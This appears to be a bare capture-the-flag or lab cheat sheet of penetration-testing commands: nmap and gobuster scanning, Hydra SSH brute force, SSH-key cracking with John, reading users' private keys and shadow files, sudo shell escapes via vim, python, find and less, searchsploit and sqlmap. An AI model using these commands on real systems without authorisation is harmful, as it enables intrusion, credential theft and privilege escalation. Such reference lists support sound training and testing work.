nmap -sV -sC <IP>
nmap -p- <IP>
nmap -p 1-1000 --open <IP>
nmap -sV -sC -p- -A -oN results.txt <IP>
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
gobuster dir -u http://<IP>:8080 -w /usr/share/wordlists/dirb/common.txt
enum4linux <IP>
smbclient -L //<IP> -N
ftp <IP>
passive
ls
cd pub
get file.txt
quit
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP> -s 2222 -t 4
gunzip /usr/share/wordlists/rockyou.txt.gz
ssh2john key_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
ssh <user>@<IP>
ssh <user>@<IP> -p 2222
chmod 600 key_rsa
ssh -i key_rsa <user>@<IP>
curl http://<IP>/robots.txt
sudo -l
find / -perm -4000 2>/dev/null
ls /home
ls -la /home/<user>/.ssh/
cat /home/<user>/.ssh/id_rsa
sudo vim -c ':!/bin/bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo find / -exec /bin/bash \;
sudo less /etc/passwd
# then type: !/bin/bash
searchsploit <service> <version>
searchsploit -m <path/to/exploit>
wget <URL>
python3 exploit.py -u http://<IP>/
less file.txt
tac file.txt
grep . file.txt
strings file.txt
find / -name "*.txt" 2>/dev/null
find / -name shadow 2>/dev/null
sqlmap -u "http://<IP>/page?id=1" --dbs
whoami
id
history
pip install <package> --break-system-packages